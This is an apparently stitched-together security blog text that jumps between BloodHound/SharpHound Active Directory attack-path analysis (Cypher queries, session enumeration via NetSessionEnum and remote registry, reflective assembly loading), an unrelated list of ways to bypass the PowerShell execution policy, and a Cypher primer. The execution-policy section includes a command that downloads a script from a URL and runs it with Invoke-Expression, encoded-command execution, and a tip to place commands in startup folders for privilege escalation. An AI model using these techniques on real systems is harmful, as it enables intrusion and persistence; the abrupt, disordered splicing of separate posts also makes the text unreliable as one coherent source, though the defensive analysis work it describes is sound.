Note: This is the second in a two-part blog series. This companion blog post covers the more technical, prescriptive tactics on executing the resilience methodology. Context is provided where appropriate. For full context, see the first blog post in the series.

Intro and Background

After releasing BloodHound at DEF CON 24, we and several others realized that while BloodHound is a great tool for attackers, its potential applications as a defensive tool are even more compelling.

In the first blog post, we covered the high-level strategy for how to unlock some of that power, which we call the Active Directory Adversary Resilience methodology.

Phase 1: Enumerate Attack Paths

After downloading SharpHound, run it with its default collection options. This will collect the local admin group membership from each reachable computer in the domain, Active Directory security group memberships, and domain trusts, and will also perform one loop of user session collection. SharpHound will write CSV files to your current working directory.
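A typical default run looks something like the sketch below; exact flag spellings vary a bit between SharpHound releases, so treat this as illustrative rather than authoritative:

```powershell
# Run the compiled collector with its default collection method
.\SharpHound.exe -c Default

# Or load the PowerShell wrapper and invoke the same collector in memory
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod Default
```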

Phase 2: Analyze Attack Paths

There are a few options for downloading and installing the analysis tools, Neo4j and the BloodHound UI; we also have a getting-started section on the BloodHound wiki. The BloodHound interface will automatically parse the CSVs and load them into the Neo4j database.

Once your data is in the Neo4j database, open up BloodHound, which will by default show you all the effective members of the Domain Admins group. Instead of stopping there, seek to identify the patterns of behavior and privileges that contribute to the exposure of the Domain Admin users. For instance, by clicking on the Domain Admins group, we can see lots of information about that group, including the number of user sessions that exist for users in that group.
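That default view corresponds roughly to asking for every user who is a member of Domain Admins, directly or through nested groups. A sketch of such a query, with a placeholder group name you would replace with your own domain, looks like this:

```cypher
MATCH (u:User)-[:MemberOf*1..]->(:Group {name:'DOMAIN ADMINS@CONTOSO.LOCAL'})
RETURN u
```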

If we click the number, the BloodHound UI will graph out the computers with sessions for members of the Domain Admins group. Further, you can analyze the total count of effective local admins across those systems.

Using the BloodHound interface, you could analyze each system one at a time; alternatively, at the Neo4j web console you can return a list of those computers along with the total number of effective admins each one has.
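The Cypher query to do this might look like the following sketch. The group name is a placeholder for your own domain, and the AdminTo/MemberOf pattern is the usual way of approximating effective local admin rights in this schema:

```cypher
// Computers where a Domain Admin has a session, with a count of effective admins on each
MATCH (c:Computer)-[:HasSession]->(:User)-[:MemberOf*1..]->(:Group {name:'DOMAIN ADMINS@CONTOSO.LOCAL'})
WITH DISTINCT c
OPTIONAL MATCH (u:User)-[:AdminTo|MemberOf*1..]->(c)
RETURN c.name AS computer, COUNT(DISTINCT u) AS effectiveAdmins
ORDER BY effectiveAdmins DESC
```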

We can also measure just how exposed the Domain Admin users are to the rest of the environment.

Phase 3: Generate Resilience Hypotheses

In the first blog post, we decided to test the effectiveness of a hypothesis centered on one pattern visible in the data: Domain Admin logons on systems that are not Domain Controllers.

In Cypher, we can discover all of the systems where Domain Admins are logged on and those systems are not Domain Controllers. Or, we can instead return a set of paths and render those paths in the BloodHound UI. We can then efficiently remove those edges by modifying the original query, this time to delete the offending edges. Both the discovery query and the deletion variant are sketched below.
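Here is a sketch of those queries, again with placeholder group names; the WHERE clause treats membership in the Domain Controllers group as the marker for a DC:

```cypher
// Domain Admin sessions on computers that are not Domain Controllers, returned as paths
MATCH p = (c:Computer)-[:HasSession]->(u:User)-[:MemberOf*1..]->(:Group {name:'DOMAIN ADMINS@CONTOSO.LOCAL'})
WHERE NOT (c)-[:MemberOf*1..]->(:Group {name:'DOMAIN CONTROLLERS@CONTOSO.LOCAL'})
RETURN p

// The same match, but deleting the offending HasSession edges to model the mitigation
MATCH (c:Computer)-[r:HasSession]->(u:User)-[:MemberOf*1..]->(:Group {name:'DOMAIN ADMINS@CONTOSO.LOCAL'})
WHERE NOT (c)-[:MemberOf*1..]->(:Group {name:'DOMAIN CONTROLLERS@CONTOSO.LOCAL'})
DELETE r
```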

Before running destructive queries like the deletion above, you may want to create a copy of the graph database so that you can go back to the original if necessary. With Neo4j this can be as simple as stopping the database service and copying the database directory to a safe location.

Conclusion and Future Work

SharpHound.ps1 runs the BloodHound C# ingestor using reflection. The compiled assembly is stored in the script itself and is loaded with reflection and Assembly.Load before its entry point is invoked.
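A minimal sketch of that reflective-load pattern is shown below. The variable names, the compression step, and the entry-point type and method names are illustrative assumptions; the real script embeds a much larger encoded blob and builds the argument array from the Invoke-BloodHound parameters:

```powershell
# Illustrative only: decode an embedded, compressed .NET assembly and load it via reflection
$encoded    = '<base64 of a Deflate-compressed assembly>'   # placeholder, not a real payload
$compressed = [System.Convert]::FromBase64String($encoded)
$inStream   = New-Object System.IO.MemoryStream(,$compressed)
$deflate    = New-Object System.IO.Compression.DeflateStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
$outStream  = New-Object System.IO.MemoryStream
$deflate.CopyTo($outStream)

# Load the assembly from memory and call a hypothetical entry point with CLI-style arguments
$assembly  = [System.Reflection.Assembly]::Load($outStream.ToArray())
$arguments = @('-c', 'Default')
$assembly.GetType('Sharphound.Program').GetMethod('InvokeSharpHound').Invoke($null, @(,[string[]]$arguments))
```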

SharpHound: Target Selection and API Usage

Parameters are converted to the equivalent CLI arguments and passed to the appropriate function. CollectionMethod specifies the collection method being used. Possible values are:

Group - Collect group membership information.
LocalGroup - Collect local group information for computers.
LocalAdmin - Collect local admin users for computers.
RDP - Collect remote desktop users for computers.
Session - Collect session information for computers.
SessionLoop - Continuously collect session information until killed.
Trusts - Enumerate domain trust data.
LoggedOn - Collect session information using privileged methods (needs admin!).
ObjectProps - Collect node property information for users and computers.

This can also be a comma-separated list of values to run multiple collection methods. The Stealth option uses stealth collection, sacrificing data quality in favor of a much reduced network footprint. Domain specifies the domain to enumerate; if not specified, the current domain is enumerated.

One of the most common questions we get from BloodHound users is related to how collection is done, as well as what targets are selected for different collection methods.

The SharpHound collector has several discrete steps which run simultaneously to collect the different data necessary for the graph. Local admin collection is done using one of two methods, depending on whether the stealth option is specified. Without the stealth option, local admin collection will first query Active Directory for a list of computers; that list is then passed to the enumeration runner, which reaches out to each computer in turn. With the stealth option, local admin data is instead derived from group policy: the relevant GPO files are processed to determine which computers those GPOs are applied to.

Session collection works the same regardless of whether stealth is specified. However, BloodHound exposes two different methods of querying session information for computers.

Both methods start by checking that port 445 is open on the target, but they then diverge. An important distinction with the NetSessionEnum API call is that it does not allow you to directly query a system to ask who is logged on. Instead, it allows you to query a system for what network sessions are established to that system and from where. Network sessions are created when network resources, such as a file share, are accessed; a good example is mounted home drives that reside on the domain controller. The fourth parameter of the API call is the information level, with 10 being the only level that gives the data necessary for BloodHound in an unauthenticated manner.
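For reference, here is a rough PowerShell sketch of calling NetSessionEnum at level 10 via P/Invoke. The struct and parameter layout follow the Win32 documentation; the target server name is an illustrative placeholder, and this is not SharpHound's actual code:

```powershell
Add-Type @'
using System;
using System.Runtime.InteropServices;

public class NetApi32
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct SESSION_INFO_10
    {
        [MarshalAs(UnmanagedType.LPWStr)] public string sesi10_cname;     // computer the session came from
        [MarshalAs(UnmanagedType.LPWStr)] public string sesi10_username;  // account that established the session
        public uint sesi10_time;
        public uint sesi10_idle_time;
    }

    [DllImport("netapi32.dll", SetLastError = true)]
    public static extern int NetSessionEnum(
        [MarshalAs(UnmanagedType.LPWStr)] string serverName,
        [MarshalAs(UnmanagedType.LPWStr)] string uncClientName,
        [MarshalAs(UnmanagedType.LPWStr)] string userName,
        int level,
        out IntPtr bufPtr,
        int prefMaxLen,
        out int entriesRead,
        out int totalEntries,
        ref int resumeHandle);

    [DllImport("netapi32.dll")]
    public static extern int NetApiBufferFree(IntPtr buffer);
}
'@

$buf = [IntPtr]::Zero; $read = 0; $total = 0; $resume = 0
# Level 10 (the SESSION_INFO_10 structure) returns the client name and username of each session
$status = [NetApi32]::NetSessionEnum('\\dc01.contoso.local', $null, $null, 10, [ref]$buf, -1, [ref]$read, [ref]$total, [ref]$resume)
if ($status -eq 0) {
    $size = [Runtime.InteropServices.Marshal]::SizeOf([type][NetApi32+SESSION_INFO_10])
    for ($i = 0; $i -lt $read; $i++) {
        $entry = [Runtime.InteropServices.Marshal]::PtrToStructure([IntPtr]($buf.ToInt64() + $i * $size), [type][NetApi32+SESSION_INFO_10])
        '{0} -> {1}' -f $entry.sesi10_username, $entry.sesi10_cname
    }
    [void][NetApi32]::NetApiBufferFree($buf)
}
```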

Running this against a domain controller with mounted shared drives will return an entry for each established session: the client computer it came from and the username that established it. Because sessions only exist where a network resource has actually been accessed, this is frequently the reason why you might not see logon sessions that you know exist. It is also important to note that the returned username does not have a domain associated with it, which means that session information has an element of guesswork involved. The LoggedOn collection method is a much more precise collection method that returns session information by asking computers who is actually logged in to the system.

The caveat is that this level of collection requires administrative privileges on hosts that you want to collect data from. This session collection is ideal for defenders, or for additional data collection after getting Domain Admin.

The LoggedOn collection method uses two different techniques to collect this data: the NetWkstaUserEnum API call and enumeration of the remote registry, where the subkeys of HKEY_USERS reveal the SIDs of users with loaded profiles. Running this against a system returns the accounts that are actually logged on to it.
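As an illustration of the second technique (not SharpHound's code), the remote registry can be queried for loaded user hives and the SIDs translated back to accounts; the hostname below is a placeholder, and the Remote Registry service must be reachable on the target:

```powershell
$target = 'workstation01.contoso.local'   # hypothetical host
# Open the HKEY_USERS hive on the remote machine
$hku = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::Users, $target)
$hku.GetSubKeyNames() |
    Where-Object { $_ -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |   # keep real user SIDs only
    ForEach-Object {
        # A loaded hive means the account is logged on; translate SID -> DOMAIN\user
        ([System.Security.Principal.SecurityIdentifier]$_).Translate([System.Security.Principal.NTAccount]).Value
    }
```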


By default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems.

The PowerShell execution policy is the setting that determines which types of PowerShell scripts, if any, can be run on the system. It was never intended to be a security control, though. Instead, it was intended to prevent administrators from shooting themselves in the foot.

There are a number of ways to bypass it, including a few that Microsoft has provided, and good overviews of them have been written elsewhere. Automation seems to be one of the more common answers I hear when I ask people why they want to bypass the execution policy, but there are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers: it is native to Windows, it can call the Windows API, and it can run commands in memory without touching disk. In the examples below I will use a script named runme.ps1. To view the current execution policy settings, use the commands below.
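Both the policy check and the sample script are sketched here; the script's contents are an illustrative stand-in, since all it needs to do is print something recognizable:

```powershell
# Show the effective execution policy, and the policy set at each scope
Get-ExecutionPolicy
Get-ExecutionPolicy -List

# runme.ps1: the one-line sample script used in the examples below
Write-Host "My voice is my passport, verify me."
```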

When I attempt to execute it on a system configured with the default execution policy, I get an error stating that running scripts is disabled on the system. Ok, enough of my babbling; below are 15 ways to bypass the PowerShell execution policy restrictions. The first is to simply copy and paste your PowerShell script into an interactive console. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

Another option is to echo the script and pipe it to PowerShell's standard input; this technique does not result in a configuration change or require writing to disk. A close variant reads the script from a file and pipes it to PowerShell's standard input; this does not result in a configuration change either, but it does require writing your script to disk. You can also download a script from a URL and execute it with Invoke-Expression; I have seen that one used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. Several of these variants are sketched below.
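Sketches of those variants follow; the file path, URL, and script contents are placeholders:

```powershell
# Echo the script and pipe it to PowerShell standard in
Write-Output "Write-Host 'My voice is my passport, verify me.'" | PowerShell.exe -NoProfile -Command -

# Read the script from a file and pipe it to PowerShell standard in
Get-Content .\runme.ps1 | PowerShell.exe -NoProfile -Command -

# Download a script from a URL and run it with Invoke-Expression
PowerShell.exe -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.com/runme.ps1')"

# Run a command directly with the -Command switch, no interactive console needed
PowerShell.exe -NoProfile -Command "Write-Host 'My voice is my passport, verify me.'"
```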

It may also be worth noting that you can place these types of PowerShell commands into batch files and drop them into autorun locations, like the all-users startup folder, to help during privilege escalation.

Commands can also be passed to PowerShell in encoded form via the EncodedCommand switch. The original sample for this approach came from Posh-SecMod, and the same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long. Another fun option, which I came across on the Obscuresec blog, is Invoke-Command; based on that blog, it can also be used to grab the execution policy from a remote computer and apply it to the local computer.
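Here are generic sketches of both ideas (not the Posh-SecMod or Obscuresec samples); the computer name is a placeholder, and the second one assumes PowerShell remoting is enabled and you have rights to change the local policy:

```powershell
# Base64-encode a command (UTF-16LE) and run it with the -EncodedCommand switch
$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes   = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
PowerShell.exe -NoProfile -EncodedCommand $encoded

# Read another computer's execution policy over PowerShell remoting and apply it locally
Invoke-Command -ComputerName server01 -ScriptBlock { Get-ExecutionPolicy } | Set-ExecutionPolicy -Force
```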

Execution policy flags can also be passed directly on the command line. If you run an unsigned script that was downloaded from the Internet under the Unrestricted policy, you are prompted for permission before it runs; finally, run the script with the relaxed policy applied.

In the previous blog post, we focused on SharpHound from an operational perspective, discussing some of the new features, as well as improved features from the original ingestor.

In previous versions of the BloodHound ingestor, and in the majority of tools released, communication with Active Directory is done using the DirectorySearcher class in the System.DirectoryServices namespace. SharpHound now talks LDAP directly through the System.DirectoryServices.Protocols namespace. DirectorySearcher provides convenience and abstraction, removing the need to handle things like paging, but at the cost of adding ADSI and COM overhead to processing and networking.

This results in more traffic, as well as lower performance overall. In a test environment, the pure LDAP method of enumeration took approximately one minute less to retrieve all the data. In this test, the data was not manipulated in any way, so the actual performance increase is likely slightly higher.
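To make the difference concrete, here is a rough sketch of the two approaches in PowerShell; the domain components, filter, and page size are placeholders, and this is not SharpHound's code:

```powershell
# ADSI-backed DirectorySearcher: convenient, pages for you, but adds ADSI/COM overhead
$root      = [ADSI]'LDAP://DC=contoso,DC=local'
$searcher  = New-Object System.DirectoryServices.DirectorySearcher($root, '(objectCategory=computer)')
$searcher.PageSize = 500
$computers = $searcher.FindAll()

# System.DirectoryServices.Protocols: raw LDAP with less overhead, but you manage paging yourself
Add-Type -AssemblyName System.DirectoryServices.Protocols
$conn    = New-Object System.DirectoryServices.Protocols.LdapConnection('contoso.local')
$scope   = [System.DirectoryServices.Protocols.SearchScope]::Subtree
$attrs   = @('name', 'dnshostname')
$request = New-Object System.DirectoryServices.Protocols.SearchRequest('DC=contoso,DC=local', '(objectCategory=computer)', $scope, $attrs)
$null    = $request.Controls.Add((New-Object System.DirectoryServices.Protocols.PageResultRequestControl(500)))
$response = $conn.SendRequest($request)   # a SearchResponse; walk $response.Entries and re-issue with the paging cookie for later pages
```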


The DirectoryServices.Protocols approach should also help avoid simple detection of directory enumeration. Another interesting feature is the addition of site searching for Domain Controllers: previously, we would use the primary domain controller (PDC) for the domain being enumerated to grab data, but with the new changes SharpHound will query your nearest Domain Controller instead. One of the most important changes made in SharpHound was the addition of caching.

In the PowerShell ingestor, there was a small amount of in-memory caching in different parts of the ingestion process, mainly in the group membership enumeration. A large portion of the resolution done during enumeration is resolving SIDs, so caching this greatly reduces the number of network requests made. Data is stored in ConcurrentDictionaries, allowing thread-safe access to the data.
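A simplified PowerShell sketch of that idea (not SharpHound's actual cache, which lives in C#): resolve a SID once, store it in a ConcurrentDictionary, and answer repeat lookups from memory:

```powershell
$sidCache = New-Object 'System.Collections.Concurrent.ConcurrentDictionary[string,string]'

function Resolve-SidCached([string]$Sid) {
    $name = $null
    # Cache hit: no further lookup needed
    if ($sidCache.TryGetValue($Sid, [ref]$name)) { return $name }
    # Cache miss: do the translation once, then remember it for the rest of the run
    $name = ([System.Security.Principal.SecurityIdentifier]$Sid).Translate([System.Security.Principal.NTAccount]).Value
    $null = $sidCache.TryAdd($Sid, $name)
    return $name
}

Resolve-SidCached 'S-1-5-32-544'   # BUILTIN\Administrators, resolved once and cached
```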

The cache file is generated using the wonderful protobuf project from Google, implemented in the protobuf-net package on NuGet. This gives us very fast loading and writing of the cache file, which is essential to keep startup time minimal. Caching has also been added on a per-run basis to several other parts of enumeration.

DNS resolution is also cached locally. Another change will be particularly useful for users of BloodHound outside the US, on localized domains. The old approach to local admin enumeration relied on an API call (NetLocalGroupGetMembers) that requires you to provide the name of the group you wish to query on a remote host; obviously this breaks on localized domains, where the Administrators group goes by a different name. You can find the paltry documentation for the underlying library online. In the example that follows, the system is part of the testlab.local domain.

In the interest of brevity, the calls to close handles have been stripped out. Believe it or not, the function does even more here, even though we already have all the information we need at this point.

Essentially, the function makes a large number of network calls that are completely unnecessary for our purposes. The RID of the local Administrators group is always 544, so SharpHound now asks for that group directly by RID rather than by name, which is a significantly reduced number of queries to accomplish the same task. Even if the Administrators group is renamed to, let's say, Super Ultra Mega Awesome Users, SharpHound will have no trouble querying the group directly and getting the necessary data back.
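To illustrate the idea (this is not SharpHound's SAMR-based implementation, just one way to address the group by its well-known SID from PowerShell; the hostname is a placeholder):

```powershell
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

$computer = 'workstation01.contoso.local'   # hypothetical target
# Bind to the machine's local accounts and find the group by well-known SID S-1-5-32-544 (RID 544),
# so it does not matter what the Administrators group is actually called on that system
$ctx   = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Machine', $computer)
$group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($ctx, 'Sid', 'S-1-5-32-544')
$group.GetMembers() | Select-Object SamAccountName, Sid
```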

The reduction in network overhead is another awesome side effect: any reduction in the network hit from admin enumeration eventually results in a significant decrease overall, due to the repeated nature of the queries. The full code of the replacement local administrator function can be found in the SharpHound repository. In the old ingestor, each step would wait until completion before moving on to the next step: group enumeration would start and finish first, followed by the next steps in the process.

By only requesting the list of AD objects and properties once, we remove a large portion of the LDAP overhead incurred by requesting the same objects and properties multiple times.

One of the most overlooked features of BloodHound is the ability to enter raw Cypher queries directly into the user interface.

However, with a bit of work, raw Cypher queries let you manipulate and examine BloodHound data in custom ways that will help you further understand your network or identify interesting relationships. Because Neo4j is a graph database rather than a relational database, querying it requires its own syntax. Cypher is a way for a user to describe what they want to do in an intuitive manner, or, as the Neo4j developers describe it, using ASCII art.

On the backend, the BloodHound user interface uses Cypher to interact with the database, both to query existing data and to insert new data. Everything in the Neo4j database is represented using common terms from graph theory, particularly edges and nodes. In the BloodHound database, a node represents an object in the Active Directory environment, such as a user, group, computer, or domain.

Nodes represent discrete objects that can be acted upon when moving through an environment. The other part of the graph is edges. Edges represent relationships between nodes.


In the BloodHound database, edges represent relationships such as MemberOf, AdminTo, HasSession, and TrustedBy; in other words, edges represent the actions necessary to act on nodes.

Together, edges and nodes create the paths that we use in BloodHound to demonstrate how different permissions in Active Directory can be abused to get to our target. Each variable in a Cypher query is defined using an identifier; in the sample query below, those identifiers are B, A, and R.
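A minimal query of that shape, assuming those identifier names, might look like this:

```cypher
MATCH (B)-[A]->(R)
RETURN B, A, R
```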


The identifier for variables can be anything you want, including entire words, such as groups. In Cypher queries, nodes are specified using parentheses, so B and R are nodes in the sample query above. Relationships are specified using brackets, so in this example A represents relationships. The dashes between the nodes and relationships can be used to specify direction. Relationships in BloodHound always go in the direction of compromise or further privilege, whether through group membership or user credentials from a session.

Finally, the RETURN statement instructs the database to return all the items matched with the corresponding variable names.

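Now consider a query that adds node and edge labels plus a bounded path length; the sketch below is one way to express what's described next:

```cypher
MATCH p = (n:User)-[r:MemberOf*1..3]->(m:Group)
RETURN p
```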

This query is a bit more refined than the previous one. By using labels on both nodes and edges, we can make our query a lot more specific. We also pre-assign the variables n and m and give them labels to make the query easier to read, and we add a length modifier to the relationship. In simple terms: give me any users that are members of a group up to three links away. When we get p back, it will contain every path the database can find that matches the pattern we asked for.
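The next refinement targets a specific group by name and uses the shortestPath function; a sketch, with a placeholder group name, might be:

```cypher
MATCH (n:User), (m:Group {name:'DOMAIN ADMINS@CONTOSO.LOCAL'}),
      p = shortestPath((n)-[*1..]->(m))
RETURN p
```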

In this query, we add a few more elements to our previous ones. We target a specific group, here the Domain Admins group for the domain, by specifying the name parameter. We also use the shortestPath function.

Using this function, we ask Neo4j to give us the shortest path it can find between each node n and the Domain Admins group. We also removed the limit on how many hops the database can search. By not specifying an upper limit, the database will go as many hops as possible to find a path.